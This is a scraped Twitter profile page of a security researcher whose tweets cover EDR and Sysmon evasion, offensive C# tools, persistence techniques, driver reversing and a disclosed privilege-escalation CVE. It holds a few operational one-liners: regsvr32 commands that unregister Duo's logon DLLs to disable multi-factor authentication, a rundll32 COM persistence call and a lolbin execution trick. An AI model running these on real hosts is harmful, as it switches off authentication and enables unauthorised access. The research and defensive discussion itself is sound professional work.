Matt Hand @matterpreter Twitter profile

Pinned Tweet

Matt Hand

1 year

I've long been interested in how EDRs work under the hood and how we can apply a more evidence-based approach to evasion. I'm happy to announce that I've written a book covering these topics with @nostarch which is now available for preorder 🎉

Evading EDR

A guide to understanding the attack-detection software running on Microsoft systems, and how to evade it.

nostarch.com

50

347

1K

Last Seen Profiles

@lindsay_I23

@sotwecom

@bokeplokalmalam

@Maysam20574627

@JoyceWhiteVance

@TheCP_Prod

@BinorRaja

@MagierChrist

@saperflo26

@RaidonWilliams

@alia_courtn

@camjurecek10

@Praw_Genshin

@bokeplokalmalam

@stw_pdg

@a_brogg

@OAlhresce

@halleLkitchen

@kyrw113512

@stw_pdg

@NKOSIKATI

@UNIMEDIOSMX

@MeiserSien

@stwmaniax

@TonyBradford_

@CaraghTenh9033

@kulotgraph

@stw_pdg

@Akki230

@stw46

@qtchicksjp

@ballstej

@LeahRusche62766

@Mbahmaryono77

@Nermeen275

Matt Hand

@matterpreter

5 years

Want to make service removal really fun? Create a service with a unicode name. The service will run but won't show in sc.exe, services.msc, or taskmgr.exe and will sometimes cause a critical error while trying to find it with PowerShell/WMI. Unicode wins again.🤦‍♂️

13

338

806

Matt Hand

@matterpreter

4 years

Just released a post detailing a methodology for analyzing Windows drivers. My goal is to lower the barrier to entry for finding exploitable driver vulnerabilities through static reversing.

Methodology for Static Reverse Engineering of Windows Kernel Drivers

Introduction

medium.com

1

331

756

Matt Hand

@matterpreter

5 years

Releasing a new tool to aide in Sysmon evasion, Shhmon () with an associated blog post including defensive recommendations

Shhmon — Silencing Sysmon via Driver Unload

Sysmon is an incredibly powerful tool to aide in data collection beyond Windows’ standard event logging capabilities. It presents a…

medium.com

5

317

577

Matt Hand

@matterpreter

11 months

So surreal to finally have a copy in my hands. What a journey this has been. Thank you to everyone at @nostarch who made this a reality.

22

74

533

Matt Hand

@matterpreter

5 years

I've been poking around the Windows kernel a lot lately and one of my favorite samples I've referenced is Mimikatz's driver, Mimidrv. I took some time and documented all of its functions and included some write-ups on important kernel structures. Post: 1/3

Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver

Mimikatz provides the opportunity to leverage kernel mode functions through the included driver, Mimidrv. Mimidrv is a signed Windows…

medium.com

3

251

488

Matt Hand

@matterpreter

4 years

New blog post discussing approaches to evasion that use less anecdotal evidence (technique X worked against Y) to one which uses observed agent capabilities to determine OPSEC-safe techniques. 1/5

Adventures in Dynamic Evasion

Most teams I have worked with rely heavily on anecdotal evidence when it comes to evasion. If an operator is asked why they chose a…

medium.com

5

198

405

Matt Hand

@matterpreter

4 years

Pushed a new tool, InspectAssembly, to OffensiveC#. This project inspects a target .NET assembly's CIL for calls to deserializers and checks if .NET remoting is being used to aid in finding potential privilege escalations on the host.

4

167

375

Matt Hand

@matterpreter

6 years

Dropping 8 new C# tools I’ve been working on for a little while. Really enjoyed writing these and I plan to continue adding to the repo.

GitHub - matterpreter/OffensiveCSharp: Collection of Offensive C# Tooling

Collection of Offensive C# Tooling. Contribute to matterpreter/OffensiveCSharp development by creating an account on GitHub.

github.com

2

150

337

Matt Hand

@matterpreter

5 years

Wrote a quick little tool to help make evasion work a little easier. This project finds the exact byte that Defender will flag on and then dumps the offending bytes, signature name, and offset. Could be helpful for testing/modifying tools and payloads.

3

155

338

Matt Hand

@matterpreter

2 years

More thoughts on initial access tradecraft and how we can potentially break detection models

Hang Fire: Challenging our Mental Model of Initial Access

For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation…

medium.com

3

120

320

Matt Hand

@matterpreter

5 years

Want to use Win32 API calls to get around some pesky command line logging? Not sure how to start or how this fits into some C# tooling? I've released a blog post today on interoperability and marshaling as an introduction

3

137

311

Matt Hand

@matterpreter

5 years

Just pushed a new POC, DriverQuery, up to the OffensiveC# repo. This allows operators to get details about kernel drivers registered on the system (and optionally only return ones not signed by Microsoft) for targeting or exfil/analysis.

0

105

254

Matt Hand

@matterpreter

4 years

Today I'm pushing up HijackHunter to the OffensiveC# repo. This tool works by parsing the IAT and delay load table of a PE and testing each import for potential hijacks. If a hijack is detected, it will tell you why it determined it and how to abuse it.

2

154

254

Matt Hand

@matterpreter

3 years

In our never-ending hunt for new persistence techniques, @mutantvillian and I spent some time digging into using preview handlers over the past few weeks. Today we're publishing our research along with detection guidance.

8

139

248

Matt Hand

@matterpreter

1 year

Preorders are live!

No Starch Press

@nostarch

1 year

Evading EDR, by Matt Hand, gives an inside look look at how Endpoint Detection & Response agents pinpoint adversary activity. Learn the ways each sensor component collects data, how to design an EDR, & how to evade one. Pre-order at 30% off w/ code GOTCHA:

10

365

2K

7

45

245

Matt Hand

@matterpreter

1 year

Dell finally released the advisory and patch so I'm finally able to drop the blog on CVE-2023-28072, a LPE in Alienware Command Center. Yes, we're still finding and exploiting .NET Remoting in 2023🙃

CVE-2023–28072: Local Privilege Escalation in Alienware Command Center

Background

medium.com

8

86

227

Matt Hand

@matterpreter

1 year

Over the past few days, I've been documenting how Windows identifies hypervisors using NtQuerySystemInformation and creating a C++ alternative with quality-of-life improvements. Here's a new blog with the details:

Hypervisor Detection with SystemHypervisorDetailInformation

Reversing how Windows gets hypervisor information

medium.com

2

73

227

Matt Hand

@matterpreter

3 years

Been spending a lot of time hunting down event sources lately to make better sense of some detections we've run into on operations. I wrote a little tool to help find event providers by recursively parsing directories/files for the specified GUID.

GitHub - matterpreter/FindETWProviderImage: Quickly search for references to a GUID in DLLs, EXEs,...

Quickly search for references to a GUID in DLLs, EXEs, and drivers - matterpreter/FindETWProviderImage

github.com

4

78

186

Matt Hand

@matterpreter

6 years

Wrote a quick C# program to enumerate abandoned COM keys. Useful for persistence as you can, in some cases, write to the missing location and call with `rundll32.exe -sta {CLSID}`. Thanks to @bohops for the solid post outlining this technique.

abandonedInprocServer32.cs

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

4

114

186

Matt Hand

@matterpreter

4 years

DLL hijacks still have value today but our approach to finding them may not always be the best. PATH hijacks are easy to find but miss things earlier in the search order. Loading Procmon on target isn't always safe. You may not be able to exfil on the target app to test in a lab.

5

76

184

Matt Hand

@matterpreter

5 years

Hey Defender friends. Turns out that removing those services with Unicode/non-printable characters is pretty hard, so I wrote you a tool to help with that. I'll be releasing the offensive PoC later this week or early next week.

1

92

179

Matt Hand

@matterpreter

3 years

Finding ways to stay busy and decided to run a super unscientific survey of open source offensive C# tools. I wanted to see what functions were most commonly P/Invoke'd across the tools (n=100). The results weren't quite what I expected but still a really interesting experiment.

2

28

156

Matt Hand

@matterpreter

2 years

Microsoft: Also Microsoft:

Mark Russinovich

@markrussinovich

2 years

Speaking of languages, it's time to halt starting any new projects in C/C++ and use Rust for those scenarios where a non-GC language is required. For the sake of security and reliability. the industry should declare those languages as deprecated.

420

2K

8K

3

25

158

Matt Hand

@matterpreter

4 years

I wrote a little Ghidra script to allow us to ingest function call trees with Neo4j. It was specifically built to help map Native APIs->EtwTi* sensors in the kernel, so here's a sample of the data we're able to get.

3

58

155

Matt Hand

@matterpreter

3 years

This one is a little different for me, but I wanted to document how I approach research projects at a high level, share some stories, and address some common issues I've seen while advising others. Hope you enjoy!

Formalized Curiosity

I grew up as an insanely curious kid. My parents have seemingly endless numbers of stories of me taking things apart and trying to put them…

medium.com

2

56

146

Matt Hand

@matterpreter

1 year

After spending nearly my entire career as a red team operator, I'm happy to share that I've joined @preludeorg to help build our prod-scale continuous security testing platform, Detect. Excited to make adversaries' lives *much* more difficult 😈 #infosec

Reimagine Detection And Response Solutions | Prelude

Prelude’s mission is to preempt real cyberthreats by helping organizations know if they are protected with complete assurance.

www.preludesecurity.com

12

8

85

Matt Hand

@matterpreter

5 years

Been digging into some offensive use cases for ETW lately. One use case that immediately jumped out at me was event subscriptions, similar to WMI persistence. Wrote up a quick POC here:

Add ETWEventSubscription by matterpreter · Pull Request #5 · matterpreter/OffensiveCSharp

This assembly is analogous to WMI event subscriptions in that it waits for a predetermined event to occur and then executes the programmed function (in this case, DoEvil()). Instead of WMI, this to...

github.com

2

36

78

Matt Hand

@matterpreter

2 years

See you tomorrow 😈

1

6

77

Matt Hand

@matterpreter

9 months

Windows is a meme. I've spent the better part of the afternoon wondering why my code isn't working. Turns out this has been known since at least 2021... @dennisbabkin

1

12

73

Matt Hand

@matterpreter

4 years

Pushed some quality of life improvements to OffensiveC# to make it a little easier to use, integrate into existing workflows better, be more C2-friendly, and squashed some bugs along the way.

Big quality of life improvements · matterpreter/OffensiveCSharp@81f3930

Made some changes to the tooling to make it more operator-friendly after working with it for close to a year now.

github.com

0

26

68

Matt Hand

@matterpreter

5 years

Temporarily disable Duo authentication on a Windows host. Nice for when you need a temporary RDP session: regsvr32 /s /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll" regsvr32 /s /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll" cc: TwitterlessNick

1

26

67

Matt Hand

@matterpreter

3 years

I'm proud to announce that the @SpecterOps Vulnerability Research for Operators course was selected for 2 runs Black Hat USA this year. I'm really excited to teach the course with @enigma0x3 and we hope you join us JUL31-AUG1 or AUG2-3.

1

16

60

Matt Hand

@matterpreter

4 years

Also, huge shout out to @monoxgas for writing my favorite post on DLL hijack tradecraft ever, which reignited my interest in this technique

1

13

60

Matt Hand

@matterpreter

3 years

Did a little digging into this one and it appears this stems from a call to ShellExecuteW inside of WorkFolders.exe /1

Elliot

@ElliotKillick

3 years

I found out "C:\Windows\System32\WorkFolders.exe" (signed by MS) can be used to run arbitrary executables in the current working directory with the name control.exe. It's like a new rundll32.exe #lolbin but for EXEs!

10

656

2K

1

9

49

Matt Hand

@matterpreter

6 years

Biggest takeway from #infiltratecon - Tons of research time and money going towards mobile exploits. More advanced threat groups don't care about your XSS and are operating at a scale unimaginable by private firms. Groups are paying $$$$ for bugs - sign of how critical these are.

1

20

43

Matt Hand

@matterpreter

9 months

When do you consider an EDR evasion to be successful? If it's something else, please let me know in the comments.

Not blocked automatically

112

Not responded to

86

No alert generated

406

Telemetry doesn't exist

194

25

11

37

Matt Hand

@matterpreter

5 years

Added C:\ physical drive serial keying and volume serial keying via WMI to Spotter as briefly described in the #APT41 report (Pages 21, 25). Physical serial keying appears to be fairly robust as I am not aware of any way to modify/spoof that attribute.

Add drive volume serial number keying · Issue #1 · matterpreter/spotter

A la APT41

github.com

1

9

39

Matt Hand

@matterpreter

3 years

The past few years have been incredibly hard on our family, but tonight we will be giving her the last dose of chemo, marking the end of treatment. She beat leukemia🧡

6

2

38

Matt Hand

@matterpreter

4 years

I drew a great deal of inspiration from @_ForrestOrr 's Siofra () and heavily referenced @spottheplanet 's post on manually parsing PE headers ().

2

16

37

Matt Hand

@matterpreter

3 years

We have to challenge the status quo of phishing. Phishing was still the initial access vector for 23% of breaches (M-Trends, 2021) and what we've always done might not be what we need today. 1/2

SpecterOps

@SpecterOps

3 years

As the state of security continues to evolve, we decided it was time to renew our approach to phishing during red team operations. Today, we're outlining our plans to make initial access ops more valuable to our customers. Read more here:

5

99

200

1

9

33

Matt Hand

@matterpreter

4 years

To accompany this post and demonstrate some of the concepts discussed, I'm releasing a PoC — SHAPESHIFTER. 2/5

GitHub - matterpreter/SHAPESHIFTER: Companion PoC for the "Adventures in Dynamic Evasion" blog post

Companion PoC for the "Adventures in Dynamic Evasion" blog post - matterpreter/SHAPESHIFTER

github.com

1

8

32

Matt Hand

@matterpreter

3 years

Just under 2 hours out from the first run of our Adversary Tactics: Vulnerability Research for Operators course at #BHUSA 🎉

1

30

Matt Hand

@matterpreter

9 months

The results are in, and a majority of folks chose either no alert or no telemetry. This is pretty interesting to me as both of these aren't really measurable unless you have access to the EDR - something that I very rarely had as a red teamer.

Matt Hand

@matterpreter

9 months

When do you consider an EDR evasion to be successful? If it's something else, please let me know in the comments.

25

11

37

6

2

28

Matt Hand

@matterpreter

9 months

Super excited to have @jsecurity101 on the team. We're going to be working on some really cool research that we believe will have asymmetric effects on the threat landscape. I look forward to seeing all the cool stuff Jonny cooks up 🙌

Jonny Johnson

@jsecurity101

9 months

Excited to announce that I have officially started at @preludeorg as a Principal Security Engineer. Let the fun begin😎

22

1

82

3

1

28

Matt Hand

@matterpreter

3 years

Expanded on the great work done by @reenz0h to add procedure identification for x86 RPC servers to #Ghidra

2

19

28

Matt Hand

@matterpreter

6 years

User persistence through junction folders as described in the Vault 7 leaks now in the OffensiveC# repo. TLDR; Add a CLSID to the end of a file and add a key in HKCU mapping it to a DLL. Verclsid.exe will execute the DLL when the file is browsed/on boot.

0

14

26

Matt Hand

@matterpreter

3 years

I don't really talk about my personal life on here, but here goes nothing. [CW: Childhood illness]

1

2

24

Matt Hand

@matterpreter

3 years

A little late but I wrapped up @standa_t 's hypervisor development course last week and had a blast. Satoshi is a great instructor and I'd highly recommend it for anyone interested in hypervisor internals.

0

5

23

Matt Hand

@matterpreter

3 years

Heads up that if you received Defender update 1.337.157.0 (4/29/2021 1:49:46 AM), DefenderCheck is now classified as VirTool:MSIL/BytzChk.C!MTB 🙄

4

10

22

Matt Hand

@matterpreter

6 years

Released Spotter, a tool for generating environmentally keyed, AES256 encrypted stage0 PS/.NET launchers, today at #ArcticCon with @l0gan54k

0

11

21

Matt Hand

@matterpreter

5 years

Thankfully, you can remove them by deleting the keys with regedit, which is able to render Unicode characters.

1

3

18

Matt Hand

@matterpreter

4 years

I've also created a Frida script to hook native APIs to facilitate testing against a simulated EDR agent. While this script is meant to accompany SHAPESHIFTER's agent, it can easily be used to test other tools and expanded to cover more native APIs 5/5

Frida script to spawn a process and monitor Native API calls

Frida script to spawn a process and monitor Native API calls - NtMonitor.py

gist.github.com

0

8

16

Matt Hand

@matterpreter

6 years

@hackdacasbah @vysecurity @ustayready @WWHackinFest

Covert Attack Mystery Box: A few novel techniques for exploiting...

From Wild West Hackin' Fest 2018 in Deadwood, SD. Presenters: Mike Felch and Beau BullockDoes the blue team got you feeling down because they are on you like...

www.youtube.com

0

7

17

Matt Hand

@matterpreter

5 years

I want to sincerely thank @gentilkiwi for releasing Mimidrv. It is an invaluable resource for understanding how we can leverage kernel functions for offense 🥝❤️ 3/3

0

2

15

Matt Hand

@matterpreter

5 years

💜

SpecterOps

@SpecterOps

5 years

We are pleased to announce the addition of two new team members today: @s0lst1c3 and @matterpreter Welcome aboard!

7

9

99

6

0

14

Matt Hand

@matterpreter

11 months

I had a great time presenting at @BlackAlpsConf with @winternl_t last week. The con was very well run and had some great talks, plus you can’t really beat the location 🏔️See you all next year!

0

14

Matt Hand

@matterpreter

6 years

Link to the post:

0

6

14

Matt Hand

@matterpreter

2 years

If you're going to read one post this month, it should be this one. Optimizing decision making on operations is going to be a *huge* leap forward.

Jackson T.

@Jackson_T

2 years

In this post, I discuss one key difference in the thinking between sophisticated adversaries and many of the red teams that try to simulate them, as well as what that means for tradecraft and tooling.

6

97

278

0

3

13

Matt Hand

@matterpreter

4 years

Had fun reversing some legacy Windows code with @jsecurity101 for this one. Just a reminder that capability abstraction has a huge benefit for offensive practitioners as well 😈

Jonny Johnson

@jsecurity101

4 years

Happy Monday everyone! Today @matterpreter and I are releasing a joint blog where we dive deep into the methodology we used to uncover the technology that atsvc utilizes within scheduled tasks. Hope you enjoy!

0

62

155

0

1

13

Matt Hand

@matterpreter

3 years

The full Jupyter Notebook is published here:

Count-PInvokes.ipynb

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

0

1

13

Matt Hand

@matterpreter

4 years

This PoC uses a reconnaissance agent to detect usermode function hooks and ships results back to a server which parses them, creates a template payload using "safe" techniques, compiles it, and then ships it back to the original agent to run it inline. 3/5

SHAPESHIFTER Demo

Using SHAPESHIFTER to evade hooks placed by a simulated EDR and launch an Apollo agent

vimeo.com

1

4

12

Matt Hand

@matterpreter

5 years

@YouDownWithTTPs @Oddvarmoe As promised, here are the events in both Event Viewer and PowerShell.

1

0

10

Matt Hand

@matterpreter

5 years

I will be supporting Spotter, going forward on my personal GitHub as both @l0gan54k and I have moved onto greener pastures. The new location is

GitHub - matterpreter/spotter: Targeted Payload Execution

Targeted Payload Execution. Contribute to matterpreter/spotter development by creating an account on GitHub.

github.com

0

7

11

Matt Hand

@matterpreter

1 year

If you just want the code, it's on my GitHub here:

GitHub - matterpreter/cpuid: A class to emulate the behavior of NtQuerySystemInformation when...

A class to emulate the behavior of NtQuerySystemInformation when passed the SystemHypervisorDetailInformation information class - matterpreter/cpuid

github.com

1

0

11

Matt Hand

@matterpreter

4 years

AT:VRO has been my passion project for the past few months and I'm incredibly excited to teach it along with an amazing cadre of instructors. If you're interested in finding and exploiting vulnerabilities in 3rd party software on Windows, we still have seats open 😈

SpecterOps

@SpecterOps

4 years

At SO-CON 2020, we are launching two new training courses in the Adversary Tactics series. Mac Tradecraft and Vulnerability Research for Operators. All students receive coins. Here is a quick preview thanks to @BlakeMoorhouse Sign up here:

1

21

56

1

3

11

Matt Hand

@matterpreter

13 years

Just started watching the @owasp appsec series and I am VERY impressed. Good job, guys. http://t.co/CA9GR2Ab

0

8

9

Matt Hand

@matterpreter

4 years

h/t to @tiraniddo and @pwntester for all of their great work in this area. Check out and if you haven't used them before.

GitHub - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters

Deserialization payload generator for a variety of .NET formatters - pwntester/ysoserial.net

github.com

0

1

9

Matt Hand

@matterpreter

4 years

Additionally, I've pushed just the reconnaissance tool from SHAPESHIFTER up to OffensiveC# as HookDetector 4/5

1

5

9

Matt Hand

@matterpreter

3 years

Just merged in the ability to search based on a provider name as well as by its GUID. The tool will also report if EtwRegister() or EventRegister() is imported, which should help hone in on which image is the true event source.

1

2

7

Matt Hand

@matterpreter

9 years

On exploiting: "Don't use a Ferrari when a cheap car will do." #infiltrate2015

0

12

6

Matt Hand

@matterpreter

5 years

@edeca @m8urnett UTF-16

0

7

Matt Hand

@matterpreter

4 years

@byt3bl33d3r Yep! For example, Sysmon is registered at 385201, which is one of the ways that Shhmon locates it in case the default name has changed. While these altitudes are registered with MSFT, they aren't enforced. The mini filter can be moved to a different altitude that isn't taken.

1

0

6

Matt Hand

@matterpreter

4 years

Features: - x86 & x64 support - Recursive import search (dependency walker) - No external requirements (no PeNet!) - Written entirely in C# for easy deployment via C2

2

0

7

Matt Hand

@matterpreter

5 years

My intent with the post is to put out documentation for Mimidrv, but also show some of the specifics of why operating in the kernel is so powerful and demonstrate the practical application through existing tooling. 2/3

1

0

7

Matt Hand

@matterpreter

4 years

There are tons of other applications for binary analysis due to how powerful Neo4j's pathfinding capabilities are. Huge thank you to @xpn for the inspiration, @cptjesus for helping with Cypher, and @markus_pieton for helping shift my approach to collection ❤️

1

0

6

Matt Hand

@matterpreter

9 months

I'll pose another question: To the pentesters/red teamers/developers who voted for "no alert" or "no telemetry", how are you evaluating that? Are you using some EDR analog (ex. procmon) for telemetry identification? How are you determining if an alert was fired?

6

0

6

Matt Hand

@matterpreter

4 years

@GironSec @harmj0y I'd be happy to accept your PR 🙂

1

0

5

Matt Hand

@matterpreter

3 years

@h0mbre_ @subat0mik I've worked in both types of shops and have noticed that, for me, having ownership of the process and the outputs leads to more motivation to work on side projects. When I worked at places that controlled the outputs, I felt a sense of "why bother" since they'd either be sold 1/2

1

0

5

Matt Hand

@matterpreter

3 years

@h0mbre_ @subat0mik go uncredited, or filled with marketing cruft that would water it down. I think it may be warranted in some ultra-specific cases, but overall I think employer's who attempt to control their employees' personal projects/publications are making the wrong call. 2/2

1

0

5

Matt Hand

@matterpreter

3 years

The first place this API looks for the target executable is the current working directory. 2/

1

2

5

Matt Hand

@matterpreter

6 years

@Oddvarmoe @samilaiho Just submitted a PR to PowerUp to add this check. Good find!

Added WDS backup file check by matterpreter · Pull Request #296 · PowerShellMafia/PowerSploit

This file contains the cleartext domain, username, and password of the account used to authenticate to Windows Setup during installation. http://blog.win-fu.com/2017/08/stored-passwords-found-all-o...

github.com

1

5

Matt Hand

@matterpreter

9 years

Awesome week of class. Thanks @Steph3nSims @jimshew @SANSInstitute Highly recommend #SEC660 if you haven't taken it.

1

3

4

Matt Hand

@matterpreter

11 months

@GabrielLandau I’d definitely try @offensive_con

0

4

Matt Hand

@matterpreter

3 years

When WorkFolders.exe is called with no parameters, it launches control.exe from whatever location in its search path (malicious or not) with the arguments "/name Microsoft.Workfolders" 3/3

0

1

4

Matt Hand

@matterpreter

3 years

@mutantvillian After some fun with Medium, the post is back up at a new link

Life is Pane: Persistence via Preview Handlers

Using shell preview handlers for privileged persistence

medium.com

1

4

Matt Hand

@matterpreter

4 years

@byt3bl33d3r It's also worth noting that these are just the minifilters and not the primary kernel drivers used by EDRs.

1

0

4

Matt Hand

@matterpreter

3 years

@rshift I hope the post helps! I'm always around to talk kernel stuff if you have questions.

1

0

4

Matt Hand

@matterpreter

2 years

@jasonhillva @SerpicoProject

GitHub - GhostManager/Ghostwriter: The SpecterOps project management and reporting engine

The SpecterOps project management and reporting engine - GhostManager/Ghostwriter

github.com

0

4

Matt Hand

@matterpreter

6 years

Also wanted to thank @CE2Wells , @mattifestation , @bohops , @arvanaghi , @harmj0y , and @cobbr_io for answering my questions, helping me test, and putting out great examples of C# tradecraft that I referenced heavily on these.

1

0

4

Matt Hand

@matterpreter

3 years

If you find this stuff interesting, you might enjoy our Vulnerability Research course. Our next (remote) public offering is March 3-4, 2022.

Adversary Tactics - VRO Training Course - March 2022

Live Online Event - This course will take place online using virtual software to stream live instructors.

www.eventbrite.com

0

4

Matt Hand

@matterpreter

6 years

@Cyb3rWard0g @FuzzySec @harmj0y @THE_HELK @Cyb3rPandaH @1ns0mn1h4ck Starting playing with it a bit last night and there's tons of potential there. Excited to see what you come up with!

0

3

Matt Hand

@matterpreter

1 year

@FabrePierrejean @nostarch The planned release date is October 31 of this year. Each chapter of the book dives deep into the internals of how a sensor works before covering anything about evasion.

1

0

3

Matt Hand

@matterpreter

4 years

@_SledGoes0x90 You commonly would compile the project and then feed it to your C2 that supports in-memory execution of .NET assemblies (e.g. Cobalt Strike's execute-assembly). If you're interested in how that works, @domchell wrote a great post on it a few months ago.

1

4

3

Matt Hand

@matterpreter

5 years

@msredmond @whitneynmaxwell You around?

0

2

Matt Hand

@matterpreter

8 years

Passed the #GXPN exam! Thanks for an awesome course @Steph3nSims @jimshew @joswr1ght @SANSPenTest @CertifyGIAC #sec660

2

0

3

Matt Hand

@matterpreter

3 years

In testing, I'm able to work through ever DLL/EXE/SYS in System32 in ~7 seconds.

1

0

3

Matt Hand

@matterpreter

3 years

@HackingLZ Yep, 10000%. There's value in both approaches based on what the client is trying to get out of the engagement. Attack surface/path identification? You absolutely have to test externally. Detection and response improvements? Then we should talk about assumed breach as an option.

0

3

Matt Hand

@matterpreter

3 years

I'm incredibly proud to put our team's approach to addressing this problem today and look forward to hearing you all's thoughts. 2/2

0

3

Matt Hand

@matterpreter

5 years

@ionstorm @FuzzySec Great work! Just bear in mind that those method/struct names are modifiable by setting the EntryPoint in DllImport to the true name and renaming the function or changing the struct name in Win32.cs to something random.

1

0

3